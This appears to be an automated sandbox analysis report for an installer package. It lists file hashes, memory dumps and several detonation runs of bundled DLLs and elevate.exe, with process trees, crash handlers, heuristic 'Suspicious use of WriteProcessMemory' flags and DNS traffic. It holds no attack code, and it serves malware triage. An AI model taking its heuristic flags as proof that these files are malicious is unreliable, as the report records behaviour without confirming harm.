C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-CN.pak

MD5 3210460a24f2e2a2edd15d6f43abbe5f
SHA1 608ff156286708ed94b7ae90c73568d6042e2dbd
SHA256 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605
SHA512 f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\vi.pak

MD5 4076d3c0c0e5f31cf883198c980d1727
SHA1 db51b746216ea68803c98d7c1a5a2b45944359f3
SHA256 f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379
SHA512 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\tr.pak

MD5 55e06cd9356d0fb6f99932c2913afc92
SHA1 aa5c532ddb3f80d2f180ad62ce38351e519a5e45
SHA256 afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9
SHA512 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-TW.pak

MD5 f466116c7ce4962fe674383d543c87f6
SHA1 f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e
SHA256 ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b
SHA512 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\7e280c11-94d3-4ccf-be9f-f1208aa9ffd9.tmp.node

MD5 ba973fe2fa62e2bfa81c30cb0d77b2c2
SHA1 69fed56755ea90b354ae637e88b04f9568c2a8cb
SHA256 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778
SHA512 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf

C:\Users\Admin\AppData\Local\Temp\9b2d9968-ab92-427d-a1cf-ccecdc2ab69b.tmp.node

MD5 56192831a7f808874207ba593f464415
SHA1 e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512 c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

C:\Users\Admin\AppData\Local\Temp\86c0865f-2ec7-47c2-95d2-2dc23ae37f1b.tmp.node

MD5 efe1f662b2b23a094b20f0a951c14b10
SHA1 9f239fbdb6ec000710bf33923d29eddf65b357c7
SHA256 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6
SHA512 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07

memory/2956-574-0x000001F114F10000-0x000001F114F32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfm3g3tp.21x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/1884-655-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-654-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-653-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-660-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-665-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-664-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-663-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-662-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-661-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-659-0x000001B629000000-0x000001B629001000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

53s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4356 wrote to memory of 1676 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4356 wrote to memory of 1676 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4356 wrote to memory of 1676 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1676 -ip 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 628

Network

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

146s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 89.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

55s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

121s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2932 wrote to memory of 2112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2932 wrote to memory of 2112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2932 wrote to memory of 2112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2932 -s 80

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

61s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Network

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240220-en

Max time kernel

120s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

57s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Network

N/A

Files

N/A